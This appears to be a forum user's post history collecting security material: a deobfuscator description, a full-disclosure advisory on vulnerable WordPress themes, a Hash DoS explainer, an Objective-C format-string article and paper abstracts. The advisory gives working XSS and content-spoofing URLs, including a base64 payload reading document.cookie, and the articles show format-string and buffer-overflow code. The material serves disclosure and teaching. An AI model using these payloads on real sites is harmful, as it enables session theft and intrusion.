Everything posted by Nytro

  1. Security Code Review Description: The speaker's speciality is web application security. After a strong background in development, his interest turned to security seven years ago when he participated in a corporate web SSO project. He is currently a trainer and auditor at Cloudbreaker Co. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors are the same without verifying. Source: Security Code Review
  2. de4dot .NET deobfuscator and unpacker [h=1]Description[/h] de4dot is an open source (GPLv3) .NET deobfuscator and unpacker written in C#. It will try its best to restore a packed and obfuscated assembly to almost the original assembly. Most of the obfuscation can be completely restored (e.g. string encryption), but symbol renaming is impossible to restore since the original names usually aren't part of the obfuscated assembly. [h=1]Features[/h] Here's a pseudo-random list of the things it will do, depending on which obfuscator was used to obfuscate an assembly:
  • Inline methods. Some obfuscators move small parts of a method to another static method and call it.
  • Decrypt strings statically or dynamically.
  • Decrypt other constants. Some obfuscators can also encrypt other constants, such as all integers, all doubles, etc.
  • Decrypt methods statically or dynamically.
  • Remove proxy methods. Many obfuscators replace most/all call instructions with a call to a delegate. This delegate in turn calls the real method.
  • Rename symbols. Even though most symbols can't be restored, it will rename them to human-readable strings. Sometimes some of the original names can be restored, though.
  • Devirtualize virtualized code.
  • Decrypt resources. Many obfuscators have an option to encrypt .NET resources.
  • Decrypt embedded files. Many obfuscators have an option to embed and possibly encrypt/compress other assemblies.
  • Remove tamper-detection code.
  • Remove anti-debug code.
  • Control flow deobfuscation. Many obfuscators modify the IL code so it looks like spaghetti code, making it very difficult to understand.
  • Restore class fields. Some obfuscators can move fields from one class to some other obfuscator-created class.
  • Convert a PE exe to a .NET exe. Some obfuscators wrap a .NET assembly inside a Win32 PE so a .NET decompiler can't read the file.
  • Remove most/all junk classes added by the obfuscator.
  • Fix some peverify errors. Many of the obfuscators are buggy and create unverifiable code by mistake.
  • Restore the types of method parameters and fields.
[h=1]Supported obfuscators/packers[/h] Agile.NET (aka CliSecure), Babel.NET, CodeFort, CodeVeil, CodeWall, CryptoObfuscator, DeepSea Obfuscator, Dotfuscator, .NET Reactor, Eazfuscator.NET, Goliath.NET, ILProtector, MaxtoCode, MPRESS, Rummage, Skater.NET, SmartAssembly, Spices.Net, Xenocode. Some of the above obfuscators are rarely used (e.g. Goliath.NET), so they have had much less testing. Help me out by reporting bugs or problems you find. Download: https://bitbucket.org/0xd4d/de4dot/downloads Source: https://bitbucket.org/0xd4d/de4dot/overview
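(For reference, basic usage is just pointing the tool at the obfuscated file; this is a minimal sketch, and flags vary between versions, so check de4dot's built-in help for the full option list:

de4dot.exe ObfuscatedAssembly.exe

The deobfuscated copy is written alongside the original, by default with a -cleaned suffix, e.g. ObfuscatedAssembly-cleaned.exe.)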
  3. Multiple vulnerabilities in multiple themes for WordPress From: "MustLive" <mustlive () websecurity com ua> Date: Sun, 23 Dec 2012 01:39:25 +0200 Hello list! Some time ago, when I found vulnerabilities in the BuddyPress plugin for WordPress (particularly in the Affinity BuddyPress theme for it) with Rokbox, which I disclosed earlier, I also found multiple vulnerable themes for WP with Rokbox. So I want to warn you about multiple vulnerabilities in multiple themes for WordPress. These are themes developed by Rokbox's developers, who bundled Rokbox (with JW Player, but without TimThumb) into their themes. The issues are Content Spoofing, Cross-Site Scripting, Full Path Disclosure and Information Leakage vulnerabilities. I disclosed vulnerabilities in JW Player in June and August (including in the commercial version, JW Player Pro) and disclosed vulnerabilities in Rokbox in December. These vulnerabilities are similar to the vulnerabilities in the Affinity BuddyPress theme. I have also found many WP themes by other developers that bundle Rokbox, but I will write about them separately, because they have many more holes.
------------------------- Affected products: -------------------------
Vulnerable are all WordPress themes by RocketTheme (during a quick search I found 16 themes for WP, in addition to the above-mentioned theme for BP, but I assume all their themes contain Rokbox with JW Player 4.4.198). They had not removed this vulnerable version of JW Player from Rokbox, and so from any of their themes (for WP and BP), when I informed them in August. Here are the 16 vulnerable themes I found:
  • rt_afterburner_wp
  • rt_refraction_wp
  • rt_solarsentinel_wp
  • rt_mixxmag_wp (Mixxmag)
  • rt_iridium_wp
  • rt_infuse_wp (infuse)
  • rt_perihelion_wp
  • rt_replicant2_wp
  • rt_affinity_wp
  • rt_nexus_wp
  • rt_sentinel
  • rt_mynxx_wp_vestnikp
  • rt_mynxx_wp (rt.mynxx.wp)
  • rt_moxy_wp
  • rt_terrantribune_wp
  • rt_meridian_wp
They add to the 94 vulnerable themes for WordPress in which I previously found vulnerabilities (http://websecurity.com.ua/4915/). Google's index currently shows up to 634,000 pages with Rokbox on WP sites, so there are a lot of vulnerable themes and web sites using them.
---------- Details: ----------
The paths for these themes are as follows:
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf
http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf
Content Spoofing (WASC-12): The file parameter accepts both video and audio files. The JW Player swf accepts arbitrary addresses in the file and image parameters, which allows an attacker to spoof the content of the flash player, i.e. by supplying the addresses of video (or audio) and/or image files from another site.
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv?=1.jpg
Content Spoofing (WASC-12): The JW Player swf accepts an arbitrary address in the config parameter, which allows an attacker to spoof the content of the flash player, i.e. by supplying the address of a config file from another site (the file and image parameters in the xml file accept arbitrary addresses). Loading a config file from another site requires a crossdomain.xml on that site.
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
1.xml:
<config>
<file>1.flv</file>
<image>1.jpg</image>
</config>
Content Spoofing (WASC-12):
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site
XSS (WASC-08):
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
Full path disclosure (WASC-13): In all these themes there is an FPD in index.php (http://site/wordpress/wp-content/themes/rt_afterburner_wp/ and likewise for the other themes), which works with default PHP settings. There are potentially FPDs in other php files of these themes as well.
Information Leakage (WASC-13): There are sites with the rt_mixxmag_wp theme whose error log exposes full paths.
http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log
------------ Timeline: ------------
2012.05.29 - informed the developers of JW Player.
2012.06.06 - disclosed on my site (JW Player).
2012.08.18 - informed the developers about new holes in JW Player Pro.
2012.08.23 - disclosed on my site (JW Player Pro).
2012.08.28 - informed the developers of Rokbox.
2012.12.14 - disclosed on my site (Rokbox).
2012.12.23 - disclosed to the lists (multiple themes for WordPress with Rokbox).
Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua Source: http://seclists.org/fulldisclosure/2012/Dec/236
  4. How to explain Hash DoS to your parents by using cats Published December 20th, 2012 by Barney Desmond

We came across this interesting article recently; it's about how an attacker can perform a denial-of-service attack by feeding perverse input to a system that uses weak hashing algorithms. This is referred to as a Hash DoS, and the specific target mentioned in the article is btrfs. btrfs is a next-gen filesystem that's expected to replace ext3/4 in Linux. It's still considered experimental but is quite usable and maturing fast. This article piqued our interest because we're using btrfs "for reals" here at Anchor. It's well and good to say that, but the article isn't very exciting unless you have a background in computer science. How would you explain Hash DoS to your parents, who probably don't have a CompSci background? This is the internet, so the answer is cats.

Welcome to Purrfect Kitty Daycare

Let's pretend that you run a daycare centre for pampered pusses. Doting owners drop their kitty off on the way to work each morning, and pick them up in the afternoon. You look after the pussies fantastically, so business is growing by leaps and bounds with more moggies every week. You can't look after all the cats, so you hire some enthusiastic helpers. Fast forward a few months: you now have 26 cat-minders working for you while you manage the business. Each minder has their own space to work in. To divide the work, you assign cats to minders based on name: all cats whose name begins with the letter 'A' go to minder no. 1, all cats whose name begins with the letter 'B' go to minder no. 2, and so on. When owners arrive to drop off or pick up their furry bundle of joy, they know exactly which room to go to! It's super simple and does the job nicely. Your offices look something like this (picture one room per letter of the alphabet). Assume, for the sake of argument, that you moved into larger premises very quickly.

What you've implemented is called a hash function. It's really basic but it does the job. As long as a cat has a name, there's a room for it, and you always know exactly where to find a cat. When you use a hash function to distribute objects like this, each object (cat) goes into a bucket (room).

Kitty Kollisions

Your rooms don't fill up evenly; this is to be expected. You might have a few cats in Room A (Alice, Alison, Amanda), and only one in Room X (Xerxes). Room A has what's called a hash collision. Finding Xerxes in the afternoon is easy, he has the whole room to himself. When Alice's owner comes to pick her up, the attendant at the front desk has to ask what she looks like (or remember from previous visits). No big deal, we just have to check all the cats in Room A until we find Alice. It takes a couple of seconds. Sometimes you'll get a lot of cats in one room, maybe a dozen, but you can still work out which one you're looking for with a little effort. You've got ninety-nine problems but cats ain't one.

Moggy Mischief

A rival appears! Kitty Kare has opened up across town and is looking to put you out of business. They've seen your hashing function in action and know how it works. They're going to use it against you, because they're evil. First, they need cats. Lots of cats. Maybe they pick up strays off the street, or just get kittens from the internet. It doesn't matter how, but they've got over nine-thousand cats. Now they give them all names starting with "Mr" – Mr Bigglesworth, Mr Fluffles, Mr Mac, Mr Pete, Mr Lincoln, Mr MoonUnit, etc. The list is practically infinite.
Each cat gets a little engraved nametag on its collar and goes on its catty way. They bring all the cats to Purrfect Kitty Daycare. Your staff are very smart people, and manage to handle the tsunami of tabbies by moving a few walls around to make enough room. It slows them down a bit, and your customers get irate that they have to wait to drop off their cat, but they get there in the end. Your offices now look something like this (picture the "M" room swallowing most of the floor). Phew, it's a good thing you invested in a rapidly reconfigurable walling system!

Meltdown

Real mayhem arrives in the afternoon: evil employees from Kitty Kare return and ask to pick up ALL the cats. One by one. Placing a cat in a room takes a roughly fixed amount of time, called constant time when dealing with algorithms, mathematically written as O(1). Finding a particular cat means going to the room and checking all the cats there. The more cats there are, the longer it takes. This is called linear time, written as O(n). On average, your staff have to search about 4,500 cats (half of all the cats in the room) before they happen to find the right one. Things get better as some of the cats are returned to their (evil) owners, but it's a bad situation for a long time. Your genuine customers are quite angry and upset, and it's well past midnight by the time you knock off and go home. That night you have dreams. Bad dreams, about being overwhelmed by cats. You've just been Hash DoS'd, with cats.

Fixing those felines

In short, the answer to this problem is to use a hash function that isn't vulnerable to this sort of attack. A cryptographic hash function is a special type of hash function that makes it difficult to create specifically-chosen collisions like the one shown here. This won't completely prevent the evil attacker from hammering away and trying to produce cat-names that happen to cause collisions, but it makes life a lot harder for them. A full-blown cryptographic hash function like SHA-1 would probably be overkill for your kitty daycare centre, but it's the right line of thinking. So long as your hash function can evenly distribute cats into rooms, all you need to worry about is having enough staff to look after them all. Purrfect!

Source: How to explain Hash DoS to your parents by using cats | Anchor Web Hosting Blog
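(To put the room/bucket analogy back into code: below is a minimal sketch in C, with hypothetical names, of the daycare's first-letter hash. Filling one bucket with 9,000 "Mr ..." cats makes lookups in that bucket degrade from a couple of checks to thousands, which is the whole attack.)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ROOMS 26

/* One "room": a linked list of cat names sharing a hash value. */
struct cat { char *name; struct cat *next; };
static struct cat *rooms[ROOMS];

/* The daycare's hash function: first letter only. This weakness is
   exactly what the rival daycare exploits. */
static unsigned room_of(const char *name) {
    return (unsigned)(name[0] - 'A') % ROOMS;
}

static void drop_off(const char *name) {            /* O(1) insert */
    struct cat *c = malloc(sizeof *c);
    c->name = strdup(name);
    c->next = rooms[room_of(name)];
    rooms[room_of(name)] = c;
}

static int pick_up(const char *name) {              /* O(n) worst case */
    int checks = 0;
    for (struct cat *c = rooms[room_of(name)]; c; c = c->next) {
        checks++;
        if (strcmp(c->name, name) == 0) break;
    }
    return checks;  /* how many cats were inspected to find ours */
}

int main(void) {
    char name[32];
    /* The rival's trick: 9,000 cats, all hashing to the 'M' room. */
    for (int i = 0; i < 9000; i++) {
        snprintf(name, sizeof name, "Mr Fluffles %d", i);
        drop_off(name);
    }
    drop_off("Xerxes");  /* one honest customer */
    printf("Finding Xerxes took %d check(s)\n", pick_up("Xerxes"));
    printf("Finding Mr Fluffles 0 took %d checks\n", pick_up("Mr Fluffles 0"));
    return 0;
}

(Swapping room_of() for a hash function the attacker can't predict, which is the article's cryptographic-hash suggestion, is what stops the rival from pre-computing colliding names.)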
  5. [h=1]Format Strings: Is Objective-C Objectively Safer?[/h] HP_SSR | August 9, 2012 - last edited August 15, 2012

With the explosion of mobile devices came mobile applications, and with the mobile applications came a plethora of new security and privacy concerns. If you've been following this blog or our products, you probably know that we just released our first Objective-C rulepacks, with a lot more support planned in the future. To kick things off, let's talk about one of the vulnerabilities that our Objective-C rulepacks can detect: format string flaws.

A common misconception is that Objective-C is a newer language compared to C and C++, and is therefore immune to many of the classic C vulnerabilities such as buffer overflows. In the C and C++ world, one cousin of the well-known buffer overflow exploit is the format string attack. Since Objective-C also supports format strings, does that mean that its applications are vulnerable as well? Let's first review how C/C++-style format string attacks work, then compare these to what Objective-C lets us do.

A string format function, such as printf(), takes in a format string and a variable list of arguments. Normally (with the exception of the %n specifier, more on that later), the format specifiers in the string are replaced with the values of the respective arguments. What happens if there are more specifiers than there are arguments? For example:

printf("%d%d%d%d%d\n", val);

C and C++ will gladly continue to pop values off the stack until they fill in a value for every format specifier. What if an attacker is able to control the format string? At best, the program will crash or function incorrectly due to the damaged call stack. At worst, it can reveal sensitive information stored in local variables or passed as arguments to functions.

The story gets worse. C and C++ support the %n specifier, which writes a value, namely the number of bytes written thus far, back to the corresponding variable. By controlling the number of bytes written and storing the value of %n, we can write any value back to the stack, including the address of any attacker-controlled malicious code. (To avoid having to write millions of characters just to form a 32-bit address, we can instead write %n four times, a single byte at a time.) If we can also manipulate the stack to fool the program into treating the value as the return pointer, then we can force the program to run our malicious code, not unlike a buffer overflow exploit.

So how much of this applies to Objective-C? The good news is that the format string methods introduced by Objective-C do not allow the %n specifier, so there are no known ways to execute arbitrary code using their format strings. The bad news is that Objective-C attempts to be backwards-compatible with C/C++ libraries, continuing to allow the old %n-style code execution exploits through the legacy functions.
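(A quick C refresher on the attack just described: a minimal sketch, with a hypothetical program, showing how excess specifiers in an attacker-controlled format string walk up the stack. Modern compilers will warn about the buggy line, which is rather the point.)

#include <stdio.h>

int main(int argc, char *argv[]) {
    const char *input = (argc > 1) ? argv[1] : "%08x.%08x.%08x.%08x";
    int secret = 0x1337;    /* stands in for sensitive stack data */
    (void)secret;

    printf(input);          /* BUG: input is used as the format string;
                               each %08x pops another value off the
                               stack, potentially leaking 'secret' */
    printf("\n");

    printf("%s\n", input);  /* FIX: input is treated as plain data */
    return 0;
}

(The same distinction carries over to NSLog, as the rest of the article shows: its first argument is a format string, so untrusted data must never end up there.)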
Nonetheless, even for the newer Objective-C-specific format string methods, using excess format specifiers to pop values off the stack still works:

void myfunc(NSString *in) {
    NSLog(in);                 // BUG: 'in' is used as the format string
    NSLog(@"Inside myfunc");
}

int main(int argc, char *argv[]) {
    NSString *test = @"%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n";
    myfunc(test);
    return NSApplicationMain(argc, (const char **) argv);
}

The output is as follows:

(gdb)
2012-02-13 22:12:12.525 objc[12983:a0f] 5fbff860.5fbff870.5fbff928.00000012.00000000.00000000.00002070.5fbff840
000017e8.5fbff860.00000000.5fbff848.00002070.5fbff850.00001784.00000000
(gdb) info args
in = (NSString *) 0x100002070
(gdb)

Note that the address of the string test, 00002070, gets printed twice in the output, presumably because it is passed twice as an argument: once to myfunc, and again to NSLog. I should also note that while constructing the above test code, the program crashed several times with an EXC_BAD_ACCESS signal, further suggesting that the format string is corrupting the stack pointer. I hope the above evidence is convincing enough to show that Objective-C does not perform any safety checks on format strings, letting them manipulate the call stack easily.

The next reasonable question is: how exactly can this be exploited? What might vulnerable code in an application look like? Consider the following code snippet:

- (BOOL)application:(UIApplication *)application openURL:(NSURL *)url sourceApplication:(NSString *)sourceApplication annotation:(id)annotation {
    // Write to debugging log
    NSLog(@"++ Entered application");
    NSString *urlquery = [url query];
    NSLog(urlquery);           // BUG: attacker-influenced format string
    ...
}

This is one of the most common mistakes made when using NSLog, and it can lead directly to a format string vulnerability. According to the official documentation, NSLog()'s first parameter is not a simple string but in fact a format string. A rogue (or compromised) process might take advantage of this vulnerability by launching the app via its registered URL scheme and supplying a URL with extraneous format specifiers. When the program reaches the line NSLog(urlquery), NSLog() expects values to fill in for these specifiers. It obtains them by gladly reaching backwards into the call stack, which corrupts the state of the stack. This causes the rest of the program to run incorrectly or eventually crash.

So in short, while Objective-C format strings manage to avoid some of the more heinous exploits that allow for arbitrary code execution, they are still vulnerable to stack manipulation. Attackers can crash your program at best, and dump sensitive data at worst. Avoid using legacy C/C++ format string methods if possible; these are still vulnerable to the code execution exploits of old. In general, be careful when working with format strings; always make sure there are equal numbers of format specifiers and arguments. More importantly, do not let sources outside of your control, such as data and messages from other applications or web services, control any part of your format strings.

Posted by sarah at 12:00 PM Source: HP Communities - Format Strings: Is Objective-C Objectively Safer? - Enterprise Business Community
  6. Foreign Code Detection on the Windows/X86 Platform Susanta Nanda, Wei Li, Lap-Chung Lam, Tzi-cker Chiueh {susanta,weili,lclam,chiueh}@cs.sunysb.edu Department of Computer Science, SUNY at Stony Brook, Stony Brook, NY 11794-4400

Abstract: As new attacks against Windows-based machines emerge almost on a daily basis, there is an increasing need to "lock down" individual users' desktop machines in corporate computing environments. One particular way to lock down a user computer is to guarantee that only authorized binary programs are allowed to run on that computer. A major advantage of this approach is that binaries downloaded without the user's knowledge, such as spyware, adware, or code entering through buffer overflow attacks, can never run on computers that are locked down this way. This paper presents the design, implementation and evaluation of FOOD, a foreign code detection system specifically for the Windows/X86 platform, where foreign code is defined as any binary program that does not go through an authorized installation procedure. FOOD verifies the legitimacy of binary images involved in process creation and library loading to ensure that only authorized binaries are used in these operations. In addition, FOOD checks the target address of every indirect branch instruction in Windows binaries to prevent illegitimate control transfers to either dynamically injected mobile code or pre-existing library functions that are potentially damaging. Combined together, these techniques strictly prevent the execution of any foreign code. Experiments with a fully working FOOD prototype show that it can indeed stop all spyware and buffer overflow attacks we tested, and its worst-case run-time performance overhead associated with foreign code detection is less than 35%.

Download: www.acsac.org/2006/papers/86.pdf
  7. Address-Space Randomization for Windows Systems Lixin Li and James E. Just, Global InfoTek, Inc., Reston, VA {nli,jjust}@globalinfotek.com R. Sekar, Stony Brook University, Stony Brook, NY sekar@cs.stonybrook.edu

Abstract: Address-space randomization (ASR) is a promising solution to defend against memory corruption attacks that have contributed to about three-quarters of US-CERT advisories in the past few years. Several techniques have been proposed for implementing ASR on Linux, but its application to Microsoft Windows, the largest monoculture on the Internet, has not received as much attention. We address this problem in this paper and describe a solution that provides about 15 bits of randomness in the locations of all (code or data) objects. Our randomization is applicable to all processes on a Windows box, including all core system services, as well as applications such as web browsers, office applications, and so on. Our solution has been deployed continuously for about a year on a desktop system used daily, and is robust enough for production use.

Download: seclab.cs.sunysb.edu/seclab/pubs/acsac06.pdf
  8. Reverse Stack Execution Babak Salamat (bsalamat@uci.edu), Andreas Gal (gal@uci.edu), Alexander Yermolovich (ayermolo@uci.edu), Karthik Manivannan (kmanivan@uci.edu), Michael Franz (franz@uci.edu) Donald Bren School of Information and Computer Sciences, University of California, Irvine, Irvine, CA 92697, USA Technical Report No. 07-07, August 23, 2007

Abstract: Introducing variability during program execution is an effective technique for fighting software monoculture, which enables the quick spread of malicious code such as viruses and worms. Existing works in the area of automatic generation of execution variability have been limited to instruction randomization and heap allocation randomization, even though stack overflows are the predominant attack vectors used to inject malicious code. We present a compiler-based technique that introduces stack variance by reversing the stack growth direction, and is thus able to close this loophole. In this paper we discuss the steps necessary to reverse the stack growth direction for the Intel x86 instruction set, which was designed for a single stack growth direction. The performance evaluation of our approach shows a negligible overhead for most applications. For one of the benchmark applications, we see a small performance gain.

Download: www.ics.uci.edu/~kmanivan/files/TechReport07-07.pdf
  9. Detection and Subversion of Virtual Machines Dan Upton, University of Virginia, CS 851 - Virtual Machines

Abstract: Recent virtual machines have been designed to take advantage of run-time information to provide various services including dynamic optimization, instrumentation, and enforcement of security policies. While these systems must run in the same user space as the program running under their control, they must remain as transparent as possible so as to prevent affecting the correctness of the guest program. However, the virtual machine must store its own code and program state as well as information about the guest program. This data, stored in the program's user space, may lead to gaps in transparency that can be used to detect their presence. Additionally, while many virtual machines have a smaller code base than operating systems, they may still contain their own unique errors and security holes. This research shows that it is possible to use different run-time clues to detect the existence of several common virtual machines. Further, information about the existence of these virtual machines can be used to attack the system. As a result, this paper presents countermeasures that should be taken by designers of these systems to prevent detection and attacks.

Download: www.cs.virginia.edu/~dsu9w/upton06detection.pdf
  10. BUFFER OVERFLOW VULNERABILITIES: EXPLOITS AND DEFENSIVE TECHNIQUES Authors: Peter Buchlovsky, Adam Butcher UID: 319295, 309235 Email: msc33pxb@cs.bham.ac.uk, ug75ajb@cs.bham.ac.uk

Introduction: Buffer overflows are a very common method of security breach. They generally occur in programs written in low-level languages like C or C++, which allow manual management of memory on the heap and stack. Server processes or low-level programs running as the superuser are the usual targets for such attacks. If a hacker can find a buffer overflow vulnerability in such a process and can exploit it, it will usually give the hacker full control of the system. The analysis of Lhee and Chapin [8] has proved most helpful in our research.

1.1 Array bounds checking

Most high-level programming languages claim to be safe. This means that programs written in these languages have rigorously controlled access to memory, so they do not suffer from buffer overflows or dangling pointers. This is in contrast to the C and C++ programming languages, which have a more cavalier approach to memory access and safety. In C, array access is not bounds-checked. That means it is possible to write past the end (or indeed the beginning, if it is being written to backwards) of an array. This leads to a number of exploits that can be used by attackers.

Download: citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.104.8202&rep=rep1&type=pdf
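(Since the excerpt hinges on C's lack of bounds checking, here is a minimal sketch, with hypothetical variables, of what "writing past the end of an array" looks like. The behaviour is undefined; depending on compiler, flags and stack layout it may overwrite the neighbouring variable, crash, or be caught by a stack canary, which is itself one of the defensive techniques such papers survey.)

#include <stdio.h>
#include <string.h>

int main(void) {
    char authenticated = 0;   /* an adjacent local an attacker targets */
    char buf[8];

    /* BUG: no bounds check. 17 bytes (16 'A's plus the terminator) are
       copied into an 8-byte buffer; the excess spills into whatever
       happens to sit next to buf on the stack. */
    strcpy(buf, "AAAAAAAAAAAAAAAA");

    if (authenticated)
        printf("access granted (the overflow flipped the flag)\n");
    return 0;
}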
  11. Code Injection Attacks on Harvard-Architecture Devices Aurélien Francillon (aurelien.francillon@inria.fr) and Claude Castelluccia (claude.castelluccia@inria.fr), INRIA Rhône-Alpes, 655 avenue de l'Europe, Montbonnot, 38334 Saint Ismier Cedex, France

ABSTRACT: Harvard architecture CPU design is common in the embedded world. Examples of Harvard-based architecture devices are the Mica family of wireless sensors. Mica motes have limited memory and can process only very small packets. Stack-based buffer overflow techniques that inject code into the stack and then execute it are therefore not applicable. It has been a common belief that code injection is impossible on Harvard architectures. This paper presents a remote code injection attack for Mica sensors. We show how to exploit program vulnerabilities to permanently inject any piece of code into the program memory of an Atmel AVR-based sensor. To our knowledge, this is the first result that presents a code injection technique for such devices. Previous work only succeeded in injecting data or performing transient attacks. Injecting permanent code is more powerful since the attacker can gain full control of the target sensor. We also show that this attack can be used to inject a worm that can propagate through the wireless sensor network and possibly create a sensor botnet. Our attack combines different techniques such as return-oriented programming and fake stack injection. We present implementation details and suggest some counter-measures.

Download: www.inrialpes.fr/planete/people/ccastel/PAPERS/CCS08.pdf
  12. Exploiting 802.11 Wireless Driver Vulnerabilities on Windows 11/2006 Johnny Cache (johnycsh[a t]802.11mercenary.net), H D Moore (hdm[a t]metasploit.com), skape (mmiller[a t]hick.org)

1) Foreword

Abstract: This paper describes the process of identifying and exploiting 802.11 wireless device driver vulnerabilities on Windows. This process is described in terms of two steps: pre-exploitation and exploitation. The pre-exploitation step provides a basic introduction to the 802.11 protocol along with a description of the tools and libraries the authors used to create a basic 802.11 protocol fuzzer. The exploitation step describes the common elements of an 802.11 wireless device driver exploit. These elements include things like the underlying payload architecture that is used when executing arbitrary code in kernel-mode on Windows, how this payload architecture has been integrated into the 3.0 version of the Metasploit Framework, and the interface that the Metasploit Framework exposes to make developing 802.11 wireless device driver exploits easy. Finally, three separate real world wireless device driver vulnerabilities are used as case studies to illustrate the application of this process. It is hoped that the description and illustration of this process can be used to show that kernel-mode vulnerabilities can be just as dangerous and just as easy to exploit as user-mode vulnerabilities. In so doing, awareness of the need for more robust kernel-mode exploit prevention technology can be raised.

Thanks: The authors would like to thank David Maynor, Richard Johnson, and Chris Eagle.

2) Introduction

Software security has matured a lot over the past decade. It has gone from being an obscure problem that garnered little interest from corporations to something that has created an industry of its own. Corporations that once saw little value in investing resources in software security now have entire teams dedicated to rooting out security issues. The reason for this shift in attitude is surely multifaceted, but it could be argued that the greatest influence came from improvements to exploitation techniques that could be used to take advantage of software vulnerabilities. The refinement of these techniques made it possible for reliable exploits to be used without any knowledge of the vulnerability. This shift effectively eliminated the already thin crutch of barrier-to-entry complacency which many corporations were guilty of leaning on. Whether or not the refinement of exploitation techniques was indeed the turning point, the fact remains that there now exists an industry that has been spawned in the name of software security.

Of particular interest for the purpose of this paper are the corporations and individuals within this industry that have invested time in researching and implementing solutions that attempt to tackle the problem of exploit prevention. As a result of this time investment, things like non-executable pages, address space layout randomization (ASLR), stack canaries, and other novel preventative measures are becoming commonplace in the desktop market. While there should be no argument that the mainstream integration of many of these technologies is a good thing, there's a problem. This problem centers around the fact that the majority of these exploit prevention solutions to date have been slightly narrow-sighted in their implementations.
In particular, these solutions generally focus on preventing exploitation in only one context: user-mode. This is not true in all cases. The authors would like to take care to mention that solutions like grsecurity from the PaX team have had support for features that help to provide kernel-level security. Furthermore, stack canary implementations have existed and are integrated with many mainstream kernels. However, not all device drivers have been compiled to take advantage of these new enhancements.

The reason for this narrow-sightedness is often defended based on the fact that kernel-mode vulnerabilities have been far less prevalent. Furthermore, kernel-mode vulnerabilities are considered by most to require a much more sophisticated attack when compared with user-mode vulnerabilities. The prevalence of kernel-mode vulnerabilities could be interpreted in many different ways. The naive way would be to think that kernel-mode vulnerabilities really are few and far between. After all, this is code that should have undergone rigorous code coverage testing. A second interpretation might consider that kernel-mode vulnerabilities are more complex and thus harder to find. A third interpretation might be that there are fewer eyes focused on looking for kernel-mode vulnerabilities. While there are certainly other factors, the authors feel that it is probably best captured by the second and third interpretation.

Even if prevalence is affected because of the relative difficulty of exploiting kernel-mode vulnerabilities, it's still a poor excuse for exploit prevention solutions to simply ignore it. The past has already shown that exploitation techniques for user-mode vulnerabilities were refined to the point of creating increasingly reliable exploits. These increasingly reliable exploits were then incorporated into automated worms. What's so different about kernel-mode vulnerabilities? Sure, they are complicated, but so were heap overflows. The authors see no reason to expect that kernel-mode vulnerabilities won't also experience a period of revolutionary public advancements to existing exploitation techniques. In fact, this period has already started[5,2,1]. Still, most corporations seem content to lean on the same set of crutches, waiting for proof that a problem really exists. It's hoped that this paper can assist in the process of making it clear that kernel-mode vulnerabilities can be just as easy to exploit as user-mode vulnerabilities.

It really shouldn't come as a surprise that kernel-mode vulnerabilities exist. The intense focus put upon preventing the exploitation of user-mode vulnerabilities has caused kernel-mode security to lag behind. This lag is further complicated by the fact that developers who write kernel-mode software must generally have a completely different mentality relative to what most user-mode developers are accustomed to. This is true regardless of what operating system a programmer might be dealing with (so long as it's a task-oriented operating system with a clear separation between system and user). User-mode programmers who decide to dabble in writing device drivers for NT will find themselves in for a few surprises. The most apparent thing one would notice is that the old Windows Driver Model (WDM) and the new Windows Driver Framework (WDF) represent completely different APIs relative to what a user-mode developer would be familiar with.
